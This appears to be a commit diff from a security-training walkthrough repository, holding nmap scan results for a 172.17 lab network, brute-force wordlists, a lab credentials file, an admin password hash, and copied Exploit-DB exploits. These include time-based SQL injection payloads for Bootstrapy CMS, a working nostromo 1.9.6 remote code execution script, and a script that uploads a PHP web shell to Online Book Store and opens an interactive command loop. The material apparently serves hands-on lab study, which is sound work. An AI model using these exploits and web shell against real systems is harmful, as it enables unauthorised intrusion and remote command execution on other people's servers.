Host: 172.17.12.252 () Status: Up
Host: 172.17.12.252 () Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 80/open/tcp//http/// Ignored State: closed (997)
Host: 172.17.13.152 () Status: Up
Host: 172.17.13.152 () Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///, 49152/open/tcp//unknown///, 49153/open/tcp//unknown///, 49154/open/tcp//unknown///, 49158/open/tcp//unknown///, 49159/open/tcp//unknown/// Ignored State: closed (991)
Host: 172.17.13.202 () Status: Up
Host: 172.17.13.202 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http/// Ignored State: closed (998)
Host: 172.17.13.249 () Status: Up
Host: 172.17.13.249 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 9999/open/tcp//abyss/// Ignored State: closed (997)
Host: 172.17.14.79 () Status: Up
Host: 172.17.14.79 () Ports: 22/open/tcp//ssh///, 8000/open/tcp//http-alt/// Ignored State: closed (998)
Host: 172.17.14.92 () Status: Up
Host: 172.17.14.92 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 9999/open/tcp//abyss/// Ignored State: closed (997)
Host: 172.17.14.156 () Status: Up
Host: 172.17.14.156 () Status: Up
Host: 172.17.15.191 () Status: Up
Host: 172.17.15.191 () Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 80/open/tcp//http/// Ignored State: closed (997)
Host: 172.17.16.110 () Status: Up
Host: 172.17.16.110 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 111/open/tcp//rpcbind///, 3389/open/tcp//ms-wbt-server///, 5901/open/tcp//vnc-1///, 6001/open/tcp//X11:1///, 8000/open/tcp//http-alt/// Ignored State: closed (993)
Host: 172.17.16.188 () Status: Up
Host: 172.17.16.188 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 3389/open/tcp//ms-wbt-server/// Ignored State: closed (997)
Host: 172.17.16.206 () Status: Up
Host: 172.17.16.206 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 111/open/tcp//rpcbind///, 3389/open/tcp//ms-wbt-server///, 5901/open/tcp//vnc-1///, 6001/open/tcp//X11:1///, 8000/open/tcp//http-alt/// Ignored State: closed (993)
Host: 172.17.17.184 () Status: Up
Host: 172.17.17.184 () Ports: 22/open/tcp//ssh///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds/// Ignored State: closed (997)
Host: 172.17.18.144 () Status: Up
Host: 172.17.18.144 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http/// Ignored State: closed (998)
Host: 172.17.19.63 () Status: Up
Host: 172.17.19.63 () Ports: 22/open/tcp//ssh///, 5000/open/tcp//upnp/// Ignored State: closed (998)
Host: 172.17.19.181 () Status: Up
Host: 172.17.19.181 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 111/open/tcp//rpcbind///, 3389/open/tcp//ms-wbt-server///, 5901/open/tcp//vnc-1///, 6001/open/tcp//X11:1///, 8000/open/tcp//http-alt/// Ignored State: closed (993)
Host: 172.17.19.249 () Status: Up
Host: 172.17.19.249 () Ports: 22/open/tcp//ssh///, 53/open/tcp//domain///, 80/open/tcp//http///, 443/open/tcp//https/// Ignored State: closed (996)
Host: 172.17.20.147 () Status: Up
Host: 172.17.20.147 () Ports: 22/open/tcp//ssh///, 8000/open/tcp//http-alt///, 8089/open/tcp//unknown/// Ignored State: closed (997)
Host: 172.17.21.5 () Status: Up
Host: 172.17.21.5 () Ports: 80/open/tcp//http///, 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///, 8080/open/tcp//http-proxy///, 49152/open/tcp//unknown///, 49153/open/tcp//unknown///, 49154/open/tcp//unknown///, 49155/open/tcp//unknown///, 49156/open/tcp//unknown///, 49163/open/tcp//unknown/// Ignored State: closed (988)
Host: 172.17.21.165 () Status: Up
Host: 172.17.21.165 () Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 111/open/tcp//rpcbind///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 2049/open/tcp//nfs/// Ignored State: closed (994)
Host: 172.17.22.221 () Status: Up
Host: 172.17.22.221 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http/// Ignored State: closed (998)
Host: 172.17.22.241 () Status: Up
Host: 172.17.22.241 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 9999/open/tcp//abyss/// Ignored State: closed (997)
Host: 172.17.22.251 () Status: Up
Host: 172.17.22.251 () Ports: 80/open/tcp//http///
Host: 172.17.23.113 () Status: Up
Host: 172.17.23.113 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 111/open/tcp//rpcbind///, 3389/open/tcp//ms-wbt-server///, 5901/open/tcp//vnc-1///, 6001/open/tcp//X11:1///
Host: 172.17.23.206 () Status: Up
Host: 172.17.23.206 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 9999/open/tcp//abyss/// Ignored State: closed (997)
Host: 172.17.23.217 () Status: Up
Host: 172.17.23.217 () Ports: 3389/open/tcp//ms-wbt-server/// Ignored State: filtered (999)
Host: 172.17.23.240 () Status: Up
Host: 172.17.23.240 () Ports: 22/closed/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//https/// Ignored State: filtered (997)
Host: 172.17.24.185 () Status: Up
Host: 172.17.24.185 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 111/open/tcp//rpcbind///, 3389/open/tcp//ms-wbt-server///, 5901/open/tcp//vnc-1///, 6001/open/tcp//X11:1///, 8000/open/tcp//http-alt/// Ignored State: closed (993)

676
Walkthroughs/NMap/scan_172_17_network.nmap Normal file
View File

@@ -0,0 +1,676 @@
# Nmap 7.20 scan initiated Feb 11 04:29:20 2021 as: nmap -sS -n -oA scan_172_17_network 172.17.35.1/20
Nmap scan report for 172.17.0.1
Host is up (0.00014s latency).
All 1000 scanned ports on 172.17.0.1 are filtered
MAC Address: 02:C8:85:B5:5A:AA (Unknown)
Nmap scan report for 172.17.0.215
Host is up (0.039s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https
MAC Address: 02:DC:9F:F6:79:DD (Unknown)
Nmap scan report for 172.17.0.240
Host is up (0.00040s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 02:7D:48:92:78:BF (Unknown)
Nmap scan report for 172.17.1.78
Host is up (0.00037s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 02:F7:6A:EE:EA:93 (Unknown)
Nmap scan report for 172.17.1.106
Host is up (0.00037s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9999/tcp open abyss
MAC Address: 02:E8:C9:13:8F:1B (Unknown)
Nmap scan report for 172.17.1.131
Host is up (0.00043s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 02:49:6C:30:C0:71 (Unknown)
Nmap scan report for 172.17.1.184
Host is up (0.00033s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
8081/tcp open blackice-icecap
MAC Address: 02:24:FA:C9:D7:07 (Unknown)
Nmap scan report for 172.17.1.228
Host is up (0.00035s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
8009/tcp open ajp13
8080/tcp open http-proxy
MAC Address: 02:37:E5:FE:5E:AB (Unknown)
Nmap scan report for 172.17.1.234
Host is up (0.00036s latency).
Not shown: 977 filtered ports
PORT STATE SERVICE
21/tcp closed ftp
22/tcp open ssh
23/tcp closed telnet
25/tcp closed smtp
53/tcp closed domain
80/tcp closed http
110/tcp closed pop3
111/tcp closed rpcbind
113/tcp closed ident
135/tcp closed msrpc
139/tcp closed netbios-ssn
199/tcp closed smux
445/tcp closed microsoft-ds
554/tcp closed rtsp
587/tcp closed submission
993/tcp closed imaps
995/tcp closed pop3s
1025/tcp closed NFS-or-IIS
1720/tcp closed h323q931
1723/tcp closed pptp
3306/tcp closed mysql
5900/tcp closed vnc
8888/tcp closed sun-answerbook
MAC Address: 02:D2:0A:65:89:5F (Unknown)
Nmap scan report for 172.17.2.137
Host is up (0.00043s latency).
Not shown: 781 filtered ports, 218 closed ports
PORT STATE SERVICE
3306/tcp open mysql
MAC Address: 02:20:B2:B5:2B:E5 (Unknown)
Nmap scan report for 172.17.2.215
Host is up (0.00065s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
80/tcp open http
135/tcp open msrpc
3389/tcp open ms-wbt-server
MAC Address: 02:52:E8:45:41:81 (Unknown)
Nmap scan report for 172.17.2.251
Host is up (0.00034s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
3389/tcp open ms-wbt-server
5901/tcp open vnc-1
6001/tcp open X11:1
8000/tcp open http-alt
MAC Address: 02:48:91:65:BD:25 (Unknown)
Nmap scan report for 172.17.3.102
Host is up (0.00039s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 02:5E:D7:55:98:69 (Unknown)
Nmap scan report for 172.17.3.145
Host is up (0.00040s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8009/tcp open ajp13
8080/tcp open http-proxy
MAC Address: 02:0B:D6:DE:08:17 (Unknown)
Nmap scan report for 172.17.3.222
Host is up (0.00063s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
3306/tcp open mysql
8000/tcp open http-alt
MAC Address: 02:EA:E4:8D:35:D5 (Unknown)
Nmap scan report for 172.17.4.16
Host is up (0.00042s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 02:BC:CF:5A:60:45 (Unknown)
Nmap scan report for 172.17.4.245
Host is up (0.00043s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 02:1B:90:56:B1:11 (Unknown)
Nmap scan report for 172.17.5.56
Host is up (0.00040s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
MAC Address: 02:65:18:A8:61:85 (Unknown)
Nmap scan report for 172.17.5.70
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
3389/tcp open ms-wbt-server
5901/tcp open vnc-1
6001/tcp open X11:1
8000/tcp open http-alt
MAC Address: 02:CA:70:C1:9E:79 (Unknown)
Nmap scan report for 172.17.6.21
Host is up (0.00078s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 02:B8:CC:43:B2:A3 (Unknown)
Nmap scan report for 172.17.6.42
Host is up (0.00039s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
3389/tcp open ms-wbt-server
5901/tcp open vnc-1
6001/tcp open X11:1
8000/tcp open http-alt
MAC Address: 02:BB:E2:33:84:81 (Unknown)
Nmap scan report for 172.17.6.97
Host is up (0.00041s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
3389/tcp open ms-wbt-server
MAC Address: 02:0E:25:B5:C8:C9 (Unknown)
Nmap scan report for 172.17.6.109
Host is up (0.00035s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
MAC Address: 02:24:FE:18:84:57 (Unknown)
Nmap scan report for 172.17.7.135
Host is up (0.00047s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
3389/tcp open ms-wbt-server
MAC Address: 02:D8:26:76:FB:AD (Unknown)
Nmap scan report for 172.17.8.131
Host is up (0.00042s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 02:17:83:5A:DB:ED (Unknown)
Nmap scan report for 172.17.8.147
Host is up (0.00039s latency).
Not shown: 987 closed ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
MAC Address: 02:19:2D:59:0A:25 (Unknown)
Nmap scan report for 172.17.9.82
Host is up (0.00040s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 02:D4:35:10:25:9D (Unknown)
Nmap scan report for 172.17.9.244
Host is up (0.00040s latency).
Not shown: 988 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
8080/tcp open http-proxy
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49165/tcp open unknown
MAC Address: 02:F5:15:50:B2:01 (Unknown)
Nmap scan report for 172.17.10.10
Host is up (0.00036s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 02:2D:3D:86:B5:2F (Unknown)
Nmap scan report for 172.17.10.13
Host is up (0.00042s latency).
Not shown: 940 closed ports, 59 filtered ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 02:22:4F:91:46:D1 (Unknown)
Nmap scan report for 172.17.10.100
Host is up (0.00027s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 02:A4:20:62:88:05 (Unknown)
Nmap scan report for 172.17.10.127
Host is up (0.00040s latency).
Not shown: 502 closed ports, 492 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 02:23:7E:B9:7F:BB (Unknown)
Nmap scan report for 172.17.11.32
Host is up (0.00044s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
3389/tcp open ms-wbt-server
5901/tcp open vnc-1
6001/tcp open X11:1
8000/tcp open http-alt
MAC Address: 02:9D:92:1B:90:4F (Unknown)
Nmap scan report for 172.17.11.45
Host is up (0.00039s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
3389/tcp open ms-wbt-server
5901/tcp open vnc-1
6001/tcp open X11:1
8000/tcp open http-alt
MAC Address: 02:BD:63:28:BA:31 (Unknown)
Nmap scan report for 172.17.12.12
Host is up (0.0011s latency).
Not shown: 588 filtered ports, 408 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
3389/tcp open ms-wbt-server
MAC Address: 02:70:B8:06:AF:85 (Unknown)
Nmap scan report for 172.17.12.151
Host is up (0.00041s latency).
Not shown: 987 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
MAC Address: 02:61:15:62:FC:37 (Unknown)
Nmap scan report for 172.17.12.227
Host is up (0.00038s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE
21/tcp closed ftp
80/tcp open http
111/tcp open rpcbind
135/tcp closed msrpc
139/tcp closed netbios-ssn
199/tcp closed smux
554/tcp closed rtsp
587/tcp closed submission
993/tcp closed imaps
1025/tcp closed NFS-or-IIS
1720/tcp closed h323q931
1723/tcp closed pptp
MAC Address: 02:EB:7A:90:E1:19 (Unknown)
Nmap scan report for 172.17.12.252
Host is up (0.00039s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 02:51:A6:B9:B5:8B (Unknown)
Nmap scan report for 172.17.13.152
Host is up (0.00043s latency).
Not shown: 991 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
MAC Address: 02:A4:A2:53:8A:61 (Unknown)
Nmap scan report for 172.17.13.202
Host is up (0.00042s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 02:7E:B0:19:F3:47 (Unknown)
Nmap scan report for 172.17.13.249
Host is up (0.00036s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9999/tcp open abyss
MAC Address: 02:50:57:33:91:63 (Unknown)
Nmap scan report for 172.17.14.79
Host is up (0.022s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
8000/tcp open http-alt
MAC Address: 02:E5:D9:7A:1D:79 (Unknown)
Nmap scan report for 172.17.14.92
Host is up (0.00042s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9999/tcp open abyss
MAC Address: 02:AF:43:DE:41:B5 (Unknown)
Nmap scan report for 172.17.14.156
Host is up (0.00011s latency).
All 1000 scanned ports on 172.17.14.156 are filtered
MAC Address: 02:3A:4B:DD:20:CF (Unknown)
Nmap scan report for 172.17.15.191
Host is up (0.00038s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 02:10:F4:8B:EB:2D (Unknown)
Nmap scan report for 172.17.16.110
Host is up (0.00042s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
3389/tcp open ms-wbt-server
5901/tcp open vnc-1
6001/tcp open X11:1
8000/tcp open http-alt
MAC Address: 02:36:B9:57:2F:F1 (Unknown)
Nmap scan report for 172.17.16.188
Host is up (0.00064s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3389/tcp open ms-wbt-server
MAC Address: 02:C8:D5:F9:A1:55 (Unknown)
Nmap scan report for 172.17.16.206
Host is up (0.00039s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
3389/tcp open ms-wbt-server
5901/tcp open vnc-1
6001/tcp open X11:1
8000/tcp open http-alt
MAC Address: 02:16:3D:09:E0:8D (Unknown)
Nmap scan report for 172.17.17.184
Host is up (0.00041s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 02:A3:65:4D:AA:17 (Unknown)
Nmap scan report for 172.17.18.144
Host is up (0.00034s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 02:AD:73:66:0A:99 (Unknown)
Nmap scan report for 172.17.19.63
Host is up (0.00036s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
MAC Address: 02:BC:92:E4:62:A1 (Unknown)
Nmap scan report for 172.17.19.181
Host is up (0.00039s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
3389/tcp open ms-wbt-server
5901/tcp open vnc-1
6001/tcp open X11:1
8000/tcp open http-alt
MAC Address: 02:2A:62:4B:8E:89 (Unknown)
Nmap scan report for 172.17.19.249
Host is up (0.00038s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
443/tcp open https
MAC Address: 02:1B:87:F5:9F:19 (Unknown)
Nmap scan report for 172.17.20.147
Host is up (0.00033s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
8000/tcp open http-alt
8089/tcp open unknown
MAC Address: 02:B0:FB:F6:84:21 (Unknown)
Nmap scan report for 172.17.21.5
Host is up (0.00041s latency).
Not shown: 988 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
8080/tcp open http-proxy
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49163/tcp open unknown
MAC Address: 02:21:1E:03:0A:F3 (Unknown)
Nmap scan report for 172.17.21.165
Host is up (0.00042s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
MAC Address: 02:B1:5A:CC:84:85 (Unknown)
Nmap scan report for 172.17.22.221
Host is up (0.00061s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 02:1B:60:C8:E4:33 (Unknown)
Nmap scan report for 172.17.22.241
Host is up (0.00043s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9999/tcp open abyss
MAC Address: 02:9B:AF:2A:E4:3F (Unknown)
Nmap scan report for 172.17.22.251
Host is up (0.00054s latency).
Not shown: 831 filtered ports, 168 closed ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 02:2D:A3:30:B2:75 (Unknown)
Nmap scan report for 172.17.23.113
Host is up (0.00068s latency).
Not shown: 543 closed ports, 451 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
3389/tcp open ms-wbt-server
5901/tcp open vnc-1
6001/tcp open X11:1
MAC Address: 02:24:8E:FC:61:3B (Unknown)
Nmap scan report for 172.17.23.206
Host is up (0.00035s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9999/tcp open abyss
MAC Address: 02:E0:98:FC:13:FD (Unknown)
Nmap scan report for 172.17.23.217
Host is up (0.00059s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
3389/tcp open ms-wbt-server
MAC Address: 02:5B:51:D6:3D:89 (Unknown)
Nmap scan report for 172.17.23.240
Host is up (0.00045s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https
MAC Address: 02:4B:7C:C8:7C:F7 (Unknown)
Nmap scan report for 172.17.24.185
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
3389/tcp open ms-wbt-server
5901/tcp open vnc-1
6001/tcp open X11:1
8000/tcp open http-alt
MAC Address: 02:4E:D0:93:3D:B9 (Unknown)

26
Walkthroughs/NoSQLi/letters.txt Normal file
View File

@@ -0,0 +1,26 @@
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z

100
Walkthroughs/NoSQLi/number.txt Normal file
View File

@@ -0,0 +1,100 @@
00
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99

2
Walkthroughs/OAuthVulnerabilities/login.txt Normal file
View File

@@ -0,0 +1,2 @@
victim:victim123
attacker:tesla@123

1
Walkthroughs/OWASP2021/crypto-failure/admin.hash Normal file
View File

@@ -0,0 +1 @@
6eea9b7ef19179a06954edd0f6c05ceb

BIN
Walkthroughs/OWASP2021/crypto-failure/webapp.db Normal file
View File

Binary file not shown.

0
Walkthroughs/OWASP2021/logging/login-logs.txt Normal file
View File

36
Walkthroughs/OWASP2021/vuln-and-outdated/46590 Normal file
View File

@@ -0,0 +1,36 @@
# Exploit Title: Bootstrapy CMS - Multiple SQL Injection
# Date: 21.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://bootstrapy.com
# Demo Site: http://bootstrapy.net/demo/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC 1: SQLi -----
Request: http://localhost/[PATH]/modules/forums/forum-thread.php
Vulnerable Parameter: thread_id (POST)
Attack Patten:
search=&thread_id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z
----- PoC 2: SQLi -----
Request: http://localhost/[PATH]/modules/pages/contact-submit.php
Vulnerable Parameter: subject (POST)
Attack Pattern:
email=sample%40email.tst&message=20&name=wUmrLVWz&subject=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&submit=
----- PoC 3 - SQLi -----
Request: http://localhost/[PATH]/modules/forums/post-new-submit.php
Vulnerable Parameter: post-id
Attack Pattern:
body=1&post-id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&quote=1&submit=&thread-id=1
----- PoC 4 - SQLi -----
Request: http://localhost/[PATH]/modules/forums/post-new-submit.php
Vulnerable Parameter: thread-id (POST)
Attack Pattern:
quote=0&reply=1&submit=&thread-id=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z

70
Walkthroughs/OWASP2021/vuln-and-outdated/47837 Normal file
View File

@@ -0,0 +1,70 @@
# Exploit Title: nostromo 1.9.6 - Remote Code Execution
# Date: 2019-12-31
# Exploit Author: Kr0ff
# Vendor Homepage:
# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
# Version: 1.9.6
# Tested on: Debian
# CVE : CVE-2019-16278
#cve2019_16278.py
#!/usr/bin/env python
import sys
import socket
art = """
_____-2019-16278
_____ _______ ______ _____\ \
_____\ \_\ | | | / / | |
/ /| || / / /|/ / /___/|
/ / /____/||\ \ \ |/| |__ |___|/
| | |____|/ \ \ \ | | | \
| | _____ \| \| | | __/ __
|\ \|\ \ |\ /| |\ \ / \
| \_____\| | | \_______/ | | \____\/ |
| | /____/| \ | | / | | |____/|
\|_____| || \|_____|/ \|____| | |
|____|/ |___|/
"""
help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'
def connect(soc):
response = ""
try:
while True:
connection = soc.recv(1024)
if len(connection) == 0:
break
response += connection
except:
pass
return response
def cve(target, port, cmd):
soc = socket.socket()
soc.connect((target, int(port)))
payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
soc.send(payload)
receive = connect(soc)
print(receive)
if __name__ == "__main__":
print(art)
try:
target = sys.argv[1]
port = sys.argv[2]
cmd = sys.argv[3]
cve(target, port, cmd)
except IndexError:
print(help_menu)

47
Walkthroughs/OWASP2021/vuln-and-outdated/47887 Normal file
View File

@@ -0,0 +1,47 @@
# Exploit Title: Online Book Store 1.0 - Unauthenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-01-07
# Exploit Author: Tib3rius
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: Ubuntu 16.04
# CVE: N/A
import argparse
import random
import requests
import string
import sys
parser = argparse.ArgumentParser()
parser.add_argument('url', action='store', help='The URL of the target.')
args = parser.parse_args()
url = args.url.rstrip('/')
random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))
payload = '<?php echo shell_exec($_GET[\'cmd\']); ?>'
file = {'image': (random_file + '.php', payload, 'text/php')}
print('> Attempting to upload PHP web shell...')
r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False)
print('> Verifying shell upload...')
r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)
if random_file in r.text:
print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php')
print('> Example command usage: ' + url + '/bootstrap/img/' + random_file + '.php?cmd=whoami')
launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
if launch_shell.lower() == 'y':
while True:
cmd = str(input('RCE $ '))
if cmd == 'exit':
sys.exit(0)
r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':cmd}, verify=False)
print(r.text)
else:
if r.status_code == 200:
print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')
else:
print('> Web shell failed to upload! The web server may not have write permissions.')

33
Walkthroughs/OWASP2021/vuln-and-outdated/48960 Normal file
View File

@@ -0,0 +1,33 @@
# Exploit Title: CSE Bookstore Authentication Bypass
# Date: 27/10/2020
# Exploit Author: Alper Basaran
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10 Enterprise 1909
